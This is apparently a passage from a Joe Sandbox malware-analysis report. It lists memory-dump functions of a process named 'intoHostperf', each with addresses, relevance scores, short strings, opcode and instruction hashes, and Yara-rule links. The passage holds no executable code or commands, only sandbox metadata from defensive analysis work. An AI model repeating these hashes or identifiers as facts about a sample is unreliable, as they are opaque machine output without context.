                                                              • String ID: X.WI$X.WI
                                                              • API String ID: 0-4287364349
                                                              • Opcode ID: 99469a4ce027c50ec466249e3d220c26a8954715232229696d92372decfdc3d8
                                                              • Instruction ID: 0556526fec30ee1ace15b073580b79cf97a22e4e1f323f802d922a3603c32065
                                                              • Opcode Fuzzy Hash: 99469a4ce027c50ec466249e3d220c26a8954715232229696d92372decfdc3d8
                                                              • Instruction Fuzzy Hash: 0421E122D1D3D38EFE787A6DA4257F86740AF117A1F2802BBD44E860C2DD0C28C1D796
                                                              Function 00007FF8494EA6FA Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (:YI${^H
                                                              • API String ID: 0-3826374928
                                                              • Opcode ID: 215ec64d1fffa6b7fb6d481592475231100962234f9720ea2832f2c88a910cf5
                                                              • Instruction ID: 97e7c2cd7e07eb2dd203986f966f9d9f193eb8dd3dc7b14efc708a7a0f141e99
                                                              • Opcode Fuzzy Hash: 215ec64d1fffa6b7fb6d481592475231100962234f9720ea2832f2c88a910cf5
                                                              • Instruction Fuzzy Hash: 6E41B43091C99BCEE778AE24C464AB977E1FF54342F2441BAC04EC758ACE386985D740
                                                              Function 00007FF8491540A6 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 99d6149de1dd7c65bb2cc46db0adc21afea5532186db41ee519f40fb725e32eb
                                                              • Instruction ID: 01dd789315f1c2ed4f3e39b573b4214794df29e4b7c51added73646eddfc5563
                                                              • Opcode Fuzzy Hash: 99d6149de1dd7c65bb2cc46db0adc21afea5532186db41ee519f40fb725e32eb
                                                              • Instruction Fuzzy Hash: 8DE1F030A1CA968FD758EF18D481675B3E1FF95360F1446B9D44ACB29BDA38F842CB81
                                                              Function 00007FF84915BBA1 Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: _
                                                              • API String ID: 0-701932520
                                                              • Opcode ID: aca0476269e48fc6b307d34ba6ceee8c689c66dafa6a67998d5f861215d81b13
                                                              • Instruction ID: b93e576ab88e36c9fe3ec4b944a5d602d1af990f1e60df2554de7b8be8e637e1
                                                              • Opcode Fuzzy Hash: aca0476269e48fc6b307d34ba6ceee8c689c66dafa6a67998d5f861215d81b13
                                                              • Instruction Fuzzy Hash: 96E1D13094DB86CFE378EF28D490975B7E1FF44364B15457EC08AC7682DA2DB8428B81
                                                              Function 00007FF8494E0742 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `MI
                                                              • API String ID: 0-1483567920
                                                              • Opcode ID: ed47800f3e5e744a1847efab720b95bee514be34b2be020f3655d0dc3e91faa2
                                                              • Instruction ID: ea42b4acb7711257434ae6751132af8fea2a45ca6cd40b55ec209dc788021e10
                                                              • Opcode Fuzzy Hash: ed47800f3e5e744a1847efab720b95bee514be34b2be020f3655d0dc3e91faa2
                                                              • Instruction Fuzzy Hash: E2B19230A0DA8A9FEB59EF68C0906B4B7A1FF55340F544179C05EC7E86DB2CB891CB90
                                                              Function 00007FF8494E8C6C Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 087baf991db466d2e15f6f9b7d76ba1b458d2e8fcea3bbb5e451296725c76946
                                                              • Instruction ID: 1a417163699611dc6171c3b6feb2fa04eaad0704ffa6758f38f9158e5f1dbf6d
                                                              • Opcode Fuzzy Hash: 087baf991db466d2e15f6f9b7d76ba1b458d2e8fcea3bbb5e451296725c76946
                                                              • Instruction Fuzzy Hash: 29A16E309195968FEF59DF18C4D06B437A1FF55361B6446BDD84ACB68ACA3CE8C1CB80
                                                              Function 00007FF84915A8E8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: e7a1f86f70788997e0de74822771f0623abda5e6859073c8c400b9c45e934a08
                                                              • Instruction ID: a24147fa81532c8b8f93142559c2ea7c68db23288add3b843e412d036df87724
                                                              • Opcode Fuzzy Hash: e7a1f86f70788997e0de74822771f0623abda5e6859073c8c400b9c45e934a08
                                                              • Instruction Fuzzy Hash: E4513830D0D68E9FDB69EF98D4546BDB7B1FF58390F5140BAC01AA7286DA382906CF50
                                                              Function 00007FF848D908D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: b55a9ebccc61ff62232447b8af9f91476bcb947a8c8b44b21053f5d3a9f1c8f8
                                                              • Instruction ID: e150a3aff6c25a36460ba6c95fc0159f785021c8a196c2934ab3b75404b8d0cc
                                                              • Opcode Fuzzy Hash: b55a9ebccc61ff62232447b8af9f91476bcb947a8c8b44b21053f5d3a9f1c8f8
                                                              • Instruction Fuzzy Hash: AB414912A0F6A55FE304B778A0AA3F97B81DF453A5F0804BFC08DC71D7DE1868418399
                                                              Function 00007FF8494E8E90 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 0718afe16e4d074c8f91f3e8ebf790ab1e07e9ef830f9b5177232ccd4af9900d
                                                              • Instruction ID: 9f0fc52c86d51d0a3568272202ce10b7e76ddcbb6ea33f210c9b094f1574c29d
                                                              • Opcode Fuzzy Hash: 0718afe16e4d074c8f91f3e8ebf790ab1e07e9ef830f9b5177232ccd4af9900d
                                                              • Instruction Fuzzy Hash: 89519E30D1C9AA8EEFB8EA1884547B5B7A2FB54350F1441BAD04ED7686CE3C69C5CB41
                                                              Function 00007FF8491511E8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 02ac81375cb6fda2fe74b8329b36a6da960ff4e42e84484a44bc7dd1ea899078
                                                              • Instruction ID: 039ff06da7325733599f3c9ca1dea06fd4b27b9d1f94fb87fbc07ed185e33df2
                                                              • Opcode Fuzzy Hash: 02ac81375cb6fda2fe74b8329b36a6da960ff4e42e84484a44bc7dd1ea899078
                                                              • Instruction Fuzzy Hash: 29515D30E0D58A9FDB59EFA8D4A49BDB7B1FF58354F1140BAC00AE7682CB386905CB50
                                                              Function 00007FF848D90960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: 192ba2633d63b198bb654a4b8613f3f72b99069418fd90e2b9503ee2ec3b1cd0
                                                              • Instruction ID: f5733fa7a122f28063ee1746df208e42ab2a52623d254a85d6a2c6260001a118
                                                              • Opcode Fuzzy Hash: 192ba2633d63b198bb654a4b8613f3f72b99069418fd90e2b9503ee2ec3b1cd0
                                                              • Instruction Fuzzy Hash: 76313422A0FA696FE344B67C645A6F977C1DF493A5F0804BED44EC31D7CE186C4142A8
                                                              Function 00007FF848D90998 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7H
                                                              • API String ID: 0-728547003
                                                              • Opcode ID: bdec90f63e828fa85ff8de5a52571aee42910e3b851016c350848a59f21c9f61
                                                              • Instruction ID: f12758af1ab2cb1e3ed052b5e91bd4bdd5b34f5726b9d419b380a3cb7453567a
                                                              • Opcode Fuzzy Hash: bdec90f63e828fa85ff8de5a52571aee42910e3b851016c350848a59f21c9f61
                                                              • Instruction Fuzzy Hash: 55314421B0E9595FE388B63C845AAB97BC1DF99365F1400BDD44EC32D3DE189C458289
                                                              Function 00007FF8494E9F75 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 669a2a11521af745ce2146f8169f96682c01ec30f1d874d1a2339f1cfd24a34b
                                                              • Instruction ID: 4388ea6fe2260cb8077944496ec45886bb96811adc51876173e063d28ce37ae1
                                                              • Opcode Fuzzy Hash: 669a2a11521af745ce2146f8169f96682c01ec30f1d874d1a2339f1cfd24a34b
                                                              • Instruction Fuzzy Hash: 3331F33091C98A8EEFA8EF98C4956BD77A1FF54384F6401BAD00E965C1DB3DA980D781
                                                              Function 00007FF8494E8E60 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 1d1e813ba1d43dafc3d226e115542458315e2101ea2c30f72e7e9ce7dd82b3d2
                                                              • Instruction ID: 966b639354025a2ceb3d31215ee306e3fec76af07ae9fc94eb766214108c8909
                                                              • Opcode Fuzzy Hash: 1d1e813ba1d43dafc3d226e115542458315e2101ea2c30f72e7e9ce7dd82b3d2
                                                              • Instruction Fuzzy Hash: DA31B62091C5E64EEF39DA1C88645757B52EB51361B2C45FAE08ACA6D7C93CB8C5C381
                                                              Function 00007FF8494E6262 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X.WI
                                                              • API String ID: 0-3889471772
                                                              • Opcode ID: 1c01a80571884f2afbe7ad760b73ff352e59eb0bd8ab06582b0d1f89972e18b4
                                                              • Instruction ID: 5e96ffb14fbb871f16d1ed5ba03cd997a059be78536d0846dafa91e5769d5950
                                                              • Opcode Fuzzy Hash: 1c01a80571884f2afbe7ad760b73ff352e59eb0bd8ab06582b0d1f89972e18b4
                                                              • Instruction Fuzzy Hash: 1B21FA31E0895D9FDFA8EF18C455AB9B3B1FB68350F1001ADD04EE3291CA35A981CB40
                                                              Function 00007FF8494E6800 Relevance: .7, Instructions: 691COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 894ac6ebab98c3c34b194097140820b600a89212186fac83856976e5daceb022
                                                              • Instruction ID: 848470a8e15e024a571c707f313cde857270f93434fba5b9a0934005779ddc3a
                                                              • Opcode Fuzzy Hash: 894ac6ebab98c3c34b194097140820b600a89212186fac83856976e5daceb022
                                                              • Instruction Fuzzy Hash: B5326330A1CA598FDFA8EF1CC855A6977E2FF55350F5041B9D04EC7292DE29AC85CB80
                                                              Function 00007FF84915145F Relevance: .5, Instructions: 459COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: beb1ee36846f568b41753d91e017ee3be37078f9370d92de941b7f92e41da665
                                                              • Instruction ID: d1dd291c06e3dee3c6d87ab12e47aee4edf056daf8119996fdfbc8f7486fe5f4
                                                              • Opcode Fuzzy Hash: beb1ee36846f568b41753d91e017ee3be37078f9370d92de941b7f92e41da665
                                                              • Instruction Fuzzy Hash: 1C02903091C5958FEB6ADF18C490AB577A1FF45364F5542BDC84E8B28ADB3CE881CB41
                                                              Function 00007FF8491524A1 Relevance: .4, Instructions: 413COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 084adc982779bf885028e1cb6dae7c135674058d186bbc48c0c919bfe1ebacf7
                                                              • Instruction ID: d894bef2a82cbdac12f5af51ff1fce42d6cd81d7f63f11fde22376c2fc38be4d
                                                              • Opcode Fuzzy Hash: 084adc982779bf885028e1cb6dae7c135674058d186bbc48c0c919bfe1ebacf7
                                                              • Instruction Fuzzy Hash: 81E1E13190DA868FE379EF28D4905B5B7E1FF54360F15097EC48AC7692DE2DB8428B81
                                                              Function 00007FF8494E0E8F Relevance: .4, Instructions: 387COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65371b6cd40c3aad9099eb369f80b5f0c8a8a3609027013fcc474a4fd88658b3
                                                              • Instruction ID: 9504e1a46f146ae0a52fb5ffe334e21c6744cfcccb60706942b3050170d94fc6
                                                              • Opcode Fuzzy Hash: 65371b6cd40c3aad9099eb369f80b5f0c8a8a3609027013fcc474a4fd88658b3
                                                              • Instruction Fuzzy Hash: 7AE1AF3051C6968FEB59DF18C4E09B17BA1FF49355B5445BDC84ACB68BCA3CE882CB81
                                                              Function 00007FF8494E1ED0 Relevance: .4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6d3c59c59069a8bc93afcfac4318570d995ba66e3212f7e9003aa89dc910fe0
                                                              • Instruction ID: 549245e09bce6c248407b2e1915df298bc4e977aa91eb975c9e1152ce942008c
                                                              • Opcode Fuzzy Hash: c6d3c59c59069a8bc93afcfac4318570d995ba66e3212f7e9003aa89dc910fe0
                                                              • Instruction Fuzzy Hash: 77C1F13090DB868FEB69EF28D491575BBE0FF45394B1405BEC08A87982CA2DB886C741
                                                              Function 00007FF8494E0EAF Relevance: .3, Instructions: 337COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64a7c21431c9076d3d29dd486a164adcf3aad9bb75463d9964312b5a3823ff10
                                                              • Instruction ID: 86ab855c4c5c009d64206ceab2bb2b91f2e47242a2e944ec50864c34c714116c
                                                              • Opcode Fuzzy Hash: 64a7c21431c9076d3d29dd486a164adcf3aad9bb75463d9964312b5a3823ff10
                                                              • Instruction Fuzzy Hash: B6C1AE3091C6968FEB29DF08C4E09B177A1FF49355B5445BDD84A8B68ACA3CE881CB81
                                                              Function 00007FF84915147F Relevance: .3, Instructions: 337COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 442baf2871683d2970cd354e9f3a45c147e98ac724dee59bf40cc4150921eab3
                                                              • Instruction ID: 74c6c2a224568c89acdc322d8617767a026cf418f390061b148c6e6079b7e7b7
                                                              • Opcode Fuzzy Hash: 442baf2871683d2970cd354e9f3a45c147e98ac724dee59bf40cc4150921eab3
                                                              • Instruction Fuzzy Hash: C9C1AE3091D5868FEB2ADF18C0D09B177A1FF45364B5546BDC85B8B68ADB3CE881CB81
                                                              Function 00007FF849150D12 Relevance: .3, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1872fce8e00b433850420c89122f20e7be40e1f5234a992839e0977ed56df987
                                                              • Instruction ID: f5541abc53e273193e571286642c2d42606f82df35476083becd3194fb8e4699
                                                              • Opcode Fuzzy Hash: 1872fce8e00b433850420c89122f20e7be40e1f5234a992839e0977ed56df987
                                                              • Instruction Fuzzy Hash: D4C1B130A1DA869FE759EF68C0906B4B7A1FF49360F55417AC04EC7A86CB2CF851CB91
                                                              Function 00007FF84915A412 Relevance: .3, Instructions: 327COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0162c94ecc73e8dbd6004501ef86881e1581d32059c2a60b777eaf8087f5529e
                                                              • Instruction ID: fea62c4d150104e8cc1b63a80c2a328bad82eae80bb226342e8d0b55b3b33eff
                                                              • Opcode Fuzzy Hash: 0162c94ecc73e8dbd6004501ef86881e1581d32059c2a60b777eaf8087f5529e
                                                              • Instruction Fuzzy Hash: 6BC1C03094EA869FE759EF28C0906B5FBA1FF45360F55417AC04EC7A86CB2CA851CF90
                                                              Function 00007FF84915AB5F Relevance: .3, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 451dd9977ae0ce9d979fc96d973529522261008384d7df1181926f5b4d504095
                                                              • Instruction ID: 9d776fad667c6ca15e14ef27ef6f352a891152d81f398dfe820a853f38c64f0f
                                                              • Opcode Fuzzy Hash: 451dd9977ae0ce9d979fc96d973529522261008384d7df1181926f5b4d504095
                                                              • Instruction Fuzzy Hash: C1C1CE705196858FEB59DF18C0D06B07BA1FF49360B5541BEC85A8B68BDB3CE882CF81
                                                              Function 00007FF849157E10 Relevance: .3, Instructions: 288COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f384524b66d1d7cf33a4df12f3be0c258d6934d35995452e201ea7a9cea41198
                                                              • Instruction ID: 8956f0ca55d025609d4c7836f86e811d2ce692b7cd7c5ba184efe2e5cb75de37
                                                              • Opcode Fuzzy Hash: f384524b66d1d7cf33a4df12f3be0c258d6934d35995452e201ea7a9cea41198
                                                              • Instruction Fuzzy Hash: BC21D212D4D5D38FF7B57A2928220BCEA509F517F4F2B09FAC44E860C7DC4C28456BA2
                                                              Function 00007FF84916731E Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e11f141e2b930d362493def5a9014f8b60971c241a3e2a15849a05819c8b9a83
                                                              • Instruction ID: c2d1a11e4ce6e29197f3b1b5a461d33baf3e2281e676d1e8f5d97fde1f35339a
                                                              • Opcode Fuzzy Hash: e11f141e2b930d362493def5a9014f8b60971c241a3e2a15849a05819c8b9a83
                                                              • Instruction Fuzzy Hash: 79A1C43091D6968FEB6AEF18C4947B47BA1FF94350F5445BDC44ACB68ADA3CA881CB40
                                                              Function 00007FF8494E844F Relevance: .3, Instructions: 274COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d49d999dc6f8b4c07791c16a4a56cf6d2977bf5b2e1f142cddec034c70ffff6d
                                                              • Instruction ID: 7d07011aa34931ead46c888fbfc0f9d376afdbee543ad007216e7e0cd49cf205
                                                              • Opcode Fuzzy Hash: d49d999dc6f8b4c07791c16a4a56cf6d2977bf5b2e1f142cddec034c70ffff6d
                                                              • Instruction Fuzzy Hash: 7DA1B23090CA869FEB59EF68C4906B4B7A1FF15360F5441B9D44EC7B86CB2CB891C791
                                                              Function 00007FF8494E78E6 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd73aa4c15f1faa61c27271b31beded0629117a84575c931e23bebfcf81848ce
                                                              • Instruction ID: c90bba9c0f44cc7445c619071135a7498d9d4f38817edeef70d6c12b2b0a1deb
                                                              • Opcode Fuzzy Hash: dd73aa4c15f1faa61c27271b31beded0629117a84575c931e23bebfcf81848ce
                                                              • Instruction Fuzzy Hash: B081D331A0DA864FFB78AE2CD445575B7E1EFA53A0B14057ED08EC3182DE2CB982C751
                                                              Function 00007FF849150246 Relevance: .3, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb1446bf24388da2ec918b6d414f3fa319b9605a3b66c771159ac19f7b7a4c7d
                                                              • Instruction ID: 7d3becf1684860010cf878c6ef38b83a67125c957ac9b1bf13ee15b1933cb15a
                                                              • Opcode Fuzzy Hash: eb1446bf24388da2ec918b6d414f3fa319b9605a3b66c771159ac19f7b7a4c7d
                                                              • Instruction Fuzzy Hash: 57812A31A0D7864FE379AE589451175BBE0EF463A0F16057ED08FC7183DA2CB846CB52
                                                              Function 00007FF849157A99 Relevance: .3, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68a885e51d4c68f6b88482e6b2a89d7c6225c2f6030eff9bcafcf008cc405c56
                                                              • Instruction ID: 248c7da86a5c09e712a0bce339783ac469840b04f961d5d8c069cf868aabf0d6
                                                              • Opcode Fuzzy Hash: 68a885e51d4c68f6b88482e6b2a89d7c6225c2f6030eff9bcafcf008cc405c56
